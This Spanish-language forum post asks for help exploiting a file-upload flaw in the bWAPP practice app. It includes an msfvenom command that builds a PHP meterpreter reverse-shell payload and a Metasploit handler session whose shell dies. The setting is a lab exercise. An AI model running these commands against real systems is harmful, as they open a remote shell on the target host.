Estimados Underc0ders;
Tengo varios días intentando resolver el problema de File Upload Exploitation in bWAPP (Bypass All Security), Y cada vez que lanzo mi exploit utilizando "exploit /multi/handler", no e podido iniciar el meterpreter> en la maquina de la victima o localhost, estoy Utilizando para PoC Kal Linux 2017.3 la herramienta de "bWAPP", también e intentando realizarlo desde Windows10 utilizando PentestBox-with-Metasploit-v2.2 y bWAPP dentro del Windows10 y no e tenido éxito, a continuación les muestro el proceso que realiza.
Creación de la Carga Útil con MSFVenom:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<My_IP> LPORT=4444 -f raw > shell.php
Uso de módulos auxiliares metasploit:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.150
LHOST => 192.168.1.150
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit
- Started reverse TCP handler on 192.168.1.150:4444
- Sending stage (37543 bytes) to 192.168.1.150
- 192.168.1.150 - Meterpreter session 1 closed. Reason: Died
----------------------------------------------------------------------
Les agradecería su apoyo con este tema.
Gracias.